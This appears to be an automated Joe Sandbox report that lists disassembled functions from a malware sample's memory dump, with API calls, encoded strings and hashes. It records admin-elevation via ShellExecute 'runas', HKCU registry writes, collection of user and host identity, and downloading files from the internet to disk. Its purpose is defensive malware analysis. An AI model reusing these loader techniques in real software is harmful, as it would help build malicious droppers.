B qBKg==, xrefs: 00CB4572
B qALg==, xrefs: 00CB45F2
B qAMQ==, xrefs: 00CB44F2

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AddressHandleInfoModuleNativeProcSystemVersion
String ID: B qALg==$B qAMQ==$B qBKg==
API String ID: 2167034304-1059425217
Opcode ID: 399e0e4e7e63fff39e5a85cd3f815cf90c2c6cc4dcf26f11a3abf9108637f10b
Instruction ID: ff9574435f640f7af79f716aa057f43310150b5c9f50c61afde12733a422cb81
Opcode Fuzzy Hash: 399e0e4e7e63fff39e5a85cd3f815cf90c2c6cc4dcf26f11a3abf9108637f10b
Instruction Fuzzy Hash: C1C14431E041805BDB18BB68EC4B7EC7761EB86320F58029DEC029B393EB769E5147D2

Uniqueness

Uniqueness Score: -1.00%

Function 00CB3680 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 359
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteA.SHELL32(00000000,00000001,?,?,00000000,00000000), ref: 00CB36ED

Strings

NSRn, xrefs: 00CB3C6D
runas, xrefs: 00CB36AF
ASij, xrefs: 00CB3C45

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: ASij$NSRn$runas
API String ID: 587946157-833901686
Opcode ID: a65524831ba39207b18ceec936638d3f421bc1758aa2e5b8012f23cfa3514d09
Instruction ID: f7c94752da4fc5d30ada42f1952c4b03b4f59077b97abaea1ea64460ee24f00d
Opcode Fuzzy Hash: a65524831ba39207b18ceec936638d3f421bc1758aa2e5b8012f23cfa3514d09
Instruction Fuzzy Hash: 32C11470600288ABEB08EF68CC86BDE3BA6EB45344F54451CFC45872D2D775EA858BD2

Uniqueness

Uniqueness Score: -1.00%

Function 00CCFC87 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 374
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00CCFD09
_free.LIBCMT ref: 00CCFD2D
_free.LIBCMT ref: 00CCFEBA
GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00CDE710), ref: 00CCFECC
_free.LIBCMT ref: 00CD0087

Strings

W. Europe Daylight Time, xrefs: 00CCFF6A
W. Europe Standard Time, xrefs: 00CCFF3B

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: W. Europe Daylight Time$W. Europe Standard Time
API String ID: 597776487-986674615
Opcode ID: b6ab44f39855ec38636e6ccbc68bbf06ca844d2f4c9f2bb06ff1a3ece3ab90af
Instruction ID: ef3b27860517d8e5590d88881680a5552ebead9be0de397dd783ee5605814422
Opcode Fuzzy Hash: b6ab44f39855ec38636e6ccbc68bbf06ca844d2f4c9f2bb06ff1a3ece3ab90af
Instruction Fuzzy Hash: 86C11671900245AFDB219F68C881FAE7BBAEF46314F24057EE5A59B292D7308F43D750

Uniqueness

Uniqueness Score: -1.00%

Function 00CC2C65 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00012C71,00CC2962), ref: 00CC2C6A

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7f3e34f37107e57e1e073668cb4fb70af1e1b904284562e8fbe7cc82cfcb9f19
Instruction ID: 4e8ab348a79ad359c4fdb4bde13aa9a6ed0341a376a48c3c6a217d52fdf80549
Opcode Fuzzy Hash: 7f3e34f37107e57e1e073668cb4fb70af1e1b904284562e8fbe7cc82cfcb9f19
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00CBFB50 Relevance: 34.6, APIs: 4, Strings: 15, Instructions: 1391COMMON

Download Yara Rule

APIs

Part of subcall function 00CB4210: GetVersionExW.KERNEL32(0000011C,?,777D6490), ref: 00CB4267

Part of subcall function 00CB4710: GetVersionExW.KERNEL32(0000011C), ref: 00CB4766

IsUserAnAdmin.SHELL32 ref: 00CBFB80

Part of subcall function 00CB2B70: RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
Part of subcall function 00CB2B70: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
Part of subcall function 00CB2B70: RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2

GetUserNameA.ADVAPI32(?,00000104), ref: 00CBFC02
GetComputerNameExW.KERNEL32(00000002,?,00000104,?,?), ref: 00CBFC5C
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CBFD67

Part of subcall function 00CB2B70: RegOpenKeyExA.ADVAPI32(80000001,00000001,00000000,000F003F,?), ref: 00CB2DD9
Part of subcall function 00CB2B70: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00CB2E07
Part of subcall function 00CB2B70: RegCloseKey.ADVAPI32(80000001), ref: 00CB2E10

Part of subcall function 00CC1350: Concurrency::cancel_current_task.LIBCPMT ref: 00CC1404

Part of subcall function 00CB2B70: GetUserNameA.ADVAPI32(?,?), ref: 00CB2F01
Part of subcall function 00CB2B70: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00CB2F38
Part of subcall function 00CB2B70: GetSidIdentifierAuthority.ADVAPI32(?), ref: 00CB2F45

Part of subcall function 00CB2B70: GetSidSubAuthorityCount.ADVAPI32(?), ref: 00CB3041
Part of subcall function 00CB2B70: GetSidSubAuthority.ADVAPI32(?,00000000), ref: 00CB3080

Strings

ydDnNQ==, xrefs: 00CBFFD8
937693, xrefs: 00CBFFCE
0MGb, xrefs: 00CC0037
ycHwNQ==, xrefs: 00CBFEFC
853321935212, xrefs: 00CBFE3E, 00CC002D
ydrmNQ==, xrefs: 00CBFF46
ydPCNQ==, xrefs: 00CC0014
BoU7MQ==, xrefs: 00CBFFF6
yczsNQ==, xrefs: 00CBFF90
ycZqNQ==, xrefs: 00CBFE89
ycn5NQ==, xrefs: 00CBFEB2
ycvBNQ==, xrefs: 00CBFF6B
ycv5NQ==, xrefs: 00CBFED7
ydLxNQ==, xrefs: 00CBFF21
ycZCNQ==, xrefs: 00CBFFB5

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Name$AuthorityUser$CloseOpenValueVersion$AccountAdminComputerConcurrency::cancel_current_taskCountFileIdentifierLookupModuleQuery
String ID: 0MGb$853321935212$937693$BoU7MQ==$ycHwNQ==$ycZCNQ==$ycZqNQ==$ycn5NQ==$ycv5NQ==$ycvBNQ==$yczsNQ==$ydDnNQ==$ydLxNQ==$ydPCNQ==$ydrmNQ==
API String ID: 3585080883-3681084012
Opcode ID: 905ed34d9f48956a9360a425efb3a034530762ec63d55a53140e75d8cb3e6001
Instruction ID: 11d7318410058e88507a8353607f23124a0e568fa0a88c2abcb10de062691f1e
Opcode Fuzzy Hash: 905ed34d9f48956a9360a425efb3a034530762ec63d55a53140e75d8cb3e6001
Instruction Fuzzy Hash: AFB2D471A101549BEB2CDB38CC89B9DB636AB82304F2482DCE449A73D6DB359FC58F51

Uniqueness

Uniqueness Score: -1.00%

Function 00CBB48E Relevance: 29.5, APIs: 6, Strings: 10, Instructions: 1457COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00CBB497
CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 00CBB5B9
GetFileAttributesA.KERNELBASE(00000000), ref: 00CBB6C2
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CBBCB9
SetCurrentDirectoryA.KERNEL32(00000000), ref: 00CBBE6E

Strings

Otu=, xrefs: 00CBBE0E
Mq==, xrefs: 00CBB579, 00CBB684, 00CBB7BC
y9OjPX9iirE=, xrefs: 00CBC0EE
937693, xrefs: 00CBBC3C
invalid stoi argument, xrefs: 00CBC8BA
x9qpHisr4L0l, xrefs: 00CBBF77
853321935212, xrefs: 00CBBE21, 00CBC635
OJq=, xrefs: 00CBC622
stoi argument out of range, xrefs: 00CBC8CE
xsOpGA==, xrefs: 00CBC035

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File$AttributesDirectory$CreateCurrentModuleName
String ID: 853321935212$937693$Mq==$OJq=$Otu=$invalid stoi argument$stoi argument out of range$x9qpHisr4L0l$xsOpGA==$y9OjPX9iirE=
API String ID: 1106825656-4130812631
Opcode ID: 03284607f950b22dc79fca78b1aaeb02703eae01c80418975feb2bc88e1f93ee
Instruction ID: e60b76a1bba92720ee73a26bb72487b5a7a4fe8f3563380484ea4f27c7bd8760
Opcode Fuzzy Hash: 03284607f950b22dc79fca78b1aaeb02703eae01c80418975feb2bc88e1f93ee
Instruction Fuzzy Hash: 57B20371A001049BEF18DB28CD85BDDBB72AF86304F14825CE4199B2D6DB76DEC58B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2B70 Relevance: 26.8, APIs: 11, Strings: 4, Instructions: 530
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2
RegOpenKeyExA.ADVAPI32(80000001,00000001,00000000,000F003F,?), ref: 00CB2DD9
RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00CB2E07
RegCloseKey.ADVAPI32(80000001), ref: 00CB2E10
GetUserNameA.ADVAPI32(?,?), ref: 00CB2F01
LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00CB2F38
GetSidIdentifierAuthority.ADVAPI32(?), ref: 00CB2F45

Part of subcall function 00CB2B70: GetSidSubAuthorityCount.ADVAPI32(?), ref: 00CB3041
Part of subcall function 00CB2B70: GetSidSubAuthority.ADVAPI32(?,00000000), ref: 00CB3080

Strings

yIRvbQ==, xrefs: 00CB2FCF
JoQo HLm, xrefs: 00CB2F52
;&v, xrefs: 00CB2F45
AILvbQ==, xrefs: 00CB3059

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Authority$CloseNameOpenValue$AccountCountIdentifierLookupQueryUser
String ID: ;&v$AILvbQ==$JoQo HLm$yIRvbQ==
API String ID: 3947990373-1666481835
Opcode ID: 2c444e33287e87f2ac7ac3ff06b30b56a67f1e04077473a11caed9bd0c53dc26
Instruction ID: e6145dbcc6cf6bd7faa6098a6fbaaab40bd1f2f7212fb05bb10d61c860a83900
Opcode Fuzzy Hash: 2c444e33287e87f2ac7ac3ff06b30b56a67f1e04077473a11caed9bd0c53dc26
Instruction Fuzzy Hash: 39022371600108ABEB18DF68CC85BEE7B79EF85304F10825DF85597292DB35DB85CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAF20 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 629
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ydLx9XH2, xrefs: 00CBB004
Mq==, xrefs: 00CBB453, 00CBB684
937693, xrefs: 00CBBC3C
invalid stoi argument, xrefs: 00CBD119
EwC+, xrefs: 00CBB1CC
853321935212, xrefs: 00CBC635
EG==, xrefs: 00CBAF35
stoi argument out of range, xrefs: 00CBD123
OJq=, xrefs: 00CBC622

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID: 853321935212$937693$EG==$EwC+$Mq==$OJq=$invalid stoi argument$stoi argument out of range$ydLx9XH2
API String ID: 0-4220198402
Opcode ID: 547755187e1437d94e8c161b6806781af0a77a9c83747b1ec7fa915211a51be9
Instruction ID: bff196ce24c26766bb098f8cb21f956df61ccde6e6def790059142d75de86ada
Opcode Fuzzy Hash: 547755187e1437d94e8c161b6806781af0a77a9c83747b1ec7fa915211a51be9
Instruction Fuzzy Hash: 54322370A002489BEF14EFA4C889BDE7B76EF41304F544158FC1557293DBB59A898BD2

Uniqueness

Uniqueness Score: -1.00%

Function 00CC2431 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00CE4738,00000FA0,?,?,00CC240F,?,00CE16E8,?,?,?,00CC0FAC,?,00CC0FAC,00CE3ABC), ref: 00CC243D
GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,00CC240F,?,00CE16E8,?,?,?,00CC0FAC,?,00CC0FAC,00CE3ABC), ref: 00CC2448
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00CC240F,?,00CE16E8,?,?,?,00CC0FAC,?,00CC0FAC,00CE3ABC), ref: 00CC2459
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00CC246B
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00CC2479
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00CC240F,?,00CE16E8,?,?,?,00CC0FAC,?,00CC0FAC,00CE3ABC), ref: 00CC249C
___scrt_fastfail.LIBCMT ref: 00CC24AD
DeleteCriticalSection.KERNEL32(00CE4738,00000007,?,?,00CC240F,?,00CE16E8,?,?,?,00CC0FAC,?,00CC0FAC,00CE3ABC), ref: 00CC24B8
CloseHandle.KERNEL32(00000000,?,?,00CC240F,?,00CE16E8,?,?,?,00CC0FAC,?,00CC0FAC,00CE3ABC), ref: 00CC24C8

Strings

WakeAllConditionVariable, xrefs: 00CC2471
kernel32.dll, xrefs: 00CC2454
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00CC2443
SleepConditionVariableCS, xrefs: 00CC2465

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: e487b38f40500e2771242b12eb87cec7874294caed9f7d35c34c5e4f90b3b6d2
Instruction ID: 3ae962a23ef8da906a439594d5df81c74f5a7ac162bba0cf1d5cb3418f1c84f3
Opcode Fuzzy Hash: e487b38f40500e2771242b12eb87cec7874294caed9f7d35c34c5e4f90b3b6d2
Instruction Fuzzy Hash: D701DF71A42711ABC728AF75FD0EF2E37E9EB85B50B05002AF911D6250EB74C940CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00CB6D23 Relevance: 21.6, APIs: 11, Strings: 1, Instructions: 555
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryA.KERNEL32(00000000), ref: 00CB6D26
CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00CB70B6
InternetOpenA.WININET(00CDFE4B,00000000,00000000,00000000,00000000), ref: 00CB70CC
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00CB70EC
InternetReadFile.WININET(00000000,00000000,00004000,00004000), ref: 00CB70FD
WriteFile.KERNELBASE(?,00000000,00004000,?,00000000), ref: 00CB7122
InternetReadFile.WININET(00000000,00000000,00004000,00004000), ref: 00CB712D
CloseHandle.KERNEL32(?), ref: 00CB713F
InternetCloseHandle.WININET(?), ref: 00CB714E
InternetCloseHandle.WININET(00000000), ref: 00CB7151
RemoveDirectoryA.KERNEL32(?,?,00000000,?,?), ref: 00CB7303

Strings

y9OjPX9iirE=, xrefs: 00CB6D6A

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$DirectoryOpenRead$CreateCurrentRemoveWrite
String ID: y9OjPX9iirE=
API String ID: 1504308605-26983213
Opcode ID: bff7dad56d38a3e3b3879fb2f2aec99bf342c37176dadca01b84a7d5e3561b8d
Instruction ID: c04d9ac9eb4889b1a29bf68c471ea16a59761276180eed9e08c34cb49d1f58a4
Opcode Fuzzy Hash: bff7dad56d38a3e3b3879fb2f2aec99bf342c37176dadca01b84a7d5e3561b8d
Instruction Fuzzy Hash: 7C02F271A00108ABEF18DB78DC85FEDBB76AF85304F24421CF855A72D6DB35DA818B51

Uniqueness

Uniqueness Score: -1.00%

Function 00CBD730 Relevance: 20.1, APIs: 3, Strings: 8, Instructions: 875
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 00CBDA41

Part of subcall function 00CB5140: SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00CB515B

Part of subcall function 00CB2B70: RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
Part of subcall function 00CB2B70: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
Part of subcall function 00CB2B70: RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2

std::_Xinvalid_argument.LIBCPMT ref: 00CBE25A
std::_Xinvalid_argument.LIBCPMT ref: 00CBE27D

Part of subcall function 00CC1350: Concurrency::cancel_current_task.LIBCPMT ref: 00CC1404

Strings

Otu=, xrefs: 00CBDD06
2dLxXGolRoEl, xrefs: 00CBDD88
invalid stoi argument, xrefs: 00CBE255, 00CBE278
D e9, xrefs: 00CBD75A, 00CBD85C
853321935212, xrefs: 00CBDD19, 00CBDF4B
OJu=, xrefs: 00CBDF27
stoi argument out of range, xrefs: 00CBE287
OJq=, xrefs: 00CBDF38

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: PathXinvalid_argumentstd::_$CloseConcurrency::cancel_current_taskFolderOpenQueryTempValue
String ID: 2dLxXGolRoEl$853321935212$D e9$OJq=$OJu=$Otu=$invalid stoi argument$stoi argument out of range
API String ID: 231225927-2205316878
Opcode ID: a5e9cfc8f1d108a8d2870093d4a876433ef802329418b7be7e96fa8f5a1b5d0d
Instruction ID: d9e7fd92a0cd99b8cb6ac99aa8ac6c7c0d2a03f67b38269c738a955f581026bd
Opcode Fuzzy Hash: a5e9cfc8f1d108a8d2870093d4a876433ef802329418b7be7e96fa8f5a1b5d0d
Instruction Fuzzy Hash: F6620471A001449BDF08EF78CC86BED7B66AF86344F58421CF806972D7EB35DA858792

Uniqueness

Uniqueness Score: -1.00%

Function 00CBE7A0 Relevance: 18.3, APIs: 1, Strings: 9, Instructions: 761
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00CBF2F6

Part of subcall function 00CC16C0: Concurrency::cancel_current_task.LIBCPMT ref: 00CC17E1

Part of subcall function 00CB2B70: RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
Part of subcall function 00CB2B70: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
Part of subcall function 00CB2B70: RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2

Part of subcall function 00CC1350: Concurrency::cancel_current_task.LIBCPMT ref: 00CC1404

Strings

ON8o, xrefs: 00CBECE6
NSRn, xrefs: 00CBEF7E
Ownv, xrefs: 00CBEECC
2xCA, xrefs: 00CBEFD7
xm==, xrefs: 00CBE8C5
invalid stoi argument, xrefs: 00CBF2F1
zoiu, xrefs: 00CBEA81
stoi argument out of range, xrefs: 00CBF300
5120, xrefs: 00CBECCF, 00CBEEB5

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task$CloseOpenQueryValueXinvalid_argumentstd::_
String ID: 2xCA$5120$NSRn$ON8o$Ownv$invalid stoi argument$stoi argument out of range$xm==$zoiu
API String ID: 886804495-1634061489
Opcode ID: abcd60b4f240f0b58cc26e01e66d37aa94ab873063001f12f41f648ae671355d
Instruction ID: 2df530b1964622052cfd16a4d9d9f79a788de6c3aecf80dcbf6c58f022490fcd
Opcode Fuzzy Hash: abcd60b4f240f0b58cc26e01e66d37aa94ab873063001f12f41f648ae671355d
Instruction Fuzzy Hash: 6A420571A00104ABDF08EF79CC86BED7B79AB42744F54466CF811972D3DB35CA868B92

Uniqueness

Uniqueness Score: -1.00%

Function 00CB73EB Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 403
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00CE0A64,00000000,00000000,00000000,00000000), ref: 00CB741E
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00CB7440
